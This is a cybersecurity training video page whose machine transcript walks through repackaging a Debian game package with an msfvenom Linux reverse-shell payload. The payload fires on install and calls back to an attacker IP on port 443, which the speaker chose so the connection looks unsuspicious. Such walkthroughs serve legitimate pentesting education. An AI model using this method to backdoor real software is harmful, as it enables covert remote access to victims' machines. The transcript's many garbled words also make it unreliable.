Part 2 - Generating the Payload
Video Activity
The reverse shell exploit begins with generating the malicious payload. Several temporary directories need to be created on the pentesting client in order to hold the depackaged files of the xbomb game, post-installation files, and the modified package containing the payload. We use the Metasploit msfvenom tool for generating the payload. One if it...
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or
Already have an account? Sign In »
Video Description
The reverse shell exploit begins with generating the malicious payload. Several temporary directories need to be created on the pentesting client in order to hold the depackaged files of the xbomb game, post-installation files, and the modified package containing the payload. We use the Metasploit msfvenom tool for generating the payload. One if its advantages is that you don't need to be within the Metasploit framework since it's possible to execute it from the Linux command line.
Video Transcription
00:04
All right, So now what we need to dio is now we move the
00:09
the expo. I'm filed to this folder.
00:12
Uh,
00:14
I'm also going to create
00:20
a work directory
00:23
when I extract the package itself. So I need to run
00:27
D package
00:29
the gash extra extract,
00:31
and I'm using tab complete there. So I just I know there's a file start with axe or just an excellent word. Hit the attack E.
00:40
And then I'm gonna go ahead and call this
00:45
expo.
00:49
I shall call it worked there. So it'll make that too confusing.
00:54
So you'll notice I have a work directory created here.
00:58
And if I look inside there, I've got the file structure that the package requires,
01:04
but I'm also gonna do is make a directory
01:07
called Debbie in
01:10
underneath worked er,
01:14
and now I'm gonna copy the control and post install files
01:19
to this Debian subdirectory
01:32
groups.
01:41
All right, well, it helps if I spell if I had the actual file little mistake there.
01:46
So first we're gonna copy the control file,
01:49
and
01:51
then we're gonna copy
01:53
post inst.
01:56
Now there's a booth in the proper place,
01:59
and we can go that director real quick
02:05
and I need to make coats the post installation file, Execute herbal. So I'm gonna do a change mode to that.
02:10
Now I can see that it's executed well. And of course, it changes color in my in my bass shell to show that that happened.
02:21
Now that I've got those things in place,
02:23
I can use the MSF venom
02:28
tool and this is part of medicine. Boy. It replaces the previous a mess of payload and, um,
02:37
other other commands that you could use from a command line to bundle together
02:40
information Thio created payload or could create a file without having to be in the medicinally console
02:47
or in the medicine a framework directly so I could just use it from the command line.
02:53
And so what I need to do I've got this in my command history. Some is gonna go ahead and find it.
03:02
What
03:04
COMESA of venom. There it is.
03:07
All right, so let's review this command real quick. It looks like it's got a lot of stuff, and it does
03:13
so Architecture er is X 64.
03:17
That's not 36 architecture,
03:21
and I tell them my platform is Lennox, and I'm now a specifying the payload
03:27
and the payload is a Lennox. 64 bit shall reverse TCP
03:32
a. Do you need to change my I p address?
03:38
So I'm gonna go ahead and
03:42
you hear that? And it was 26.1 29 I believe.
03:46
Open up a new town and don't check myself.
03:50
Yep. When I need you won 68 26 1 29
03:55
Okay,
03:57
I'm also going to choose.
03:59
Specify that my little comport is 443
04:02
so that when
04:04
the victim connects to my website, it won't look like a suspicious connection at all. 443 is a normal port to see connected to websites.
04:15
I'm also specifying a by code
04:17
of hex 00 to exclude from this Pedro generation.
04:24
Ah, that's needed for
04:26
better compatibility with this particular architecture.
04:30
I'm also specifying the awkward format and which is elf
04:34
and then my own put file.
04:38
I know it's underneath route Backdoor worked there User games Expo. I'm scores. So this
04:45
payload becomes part of the package
04:47
and then again, with the victim, installs it than that
04:51
capability for the river shell should be activated.
04:54
So we'll go ahead and run the command.
04:58
It takes a moment
Up Next
Similar Content
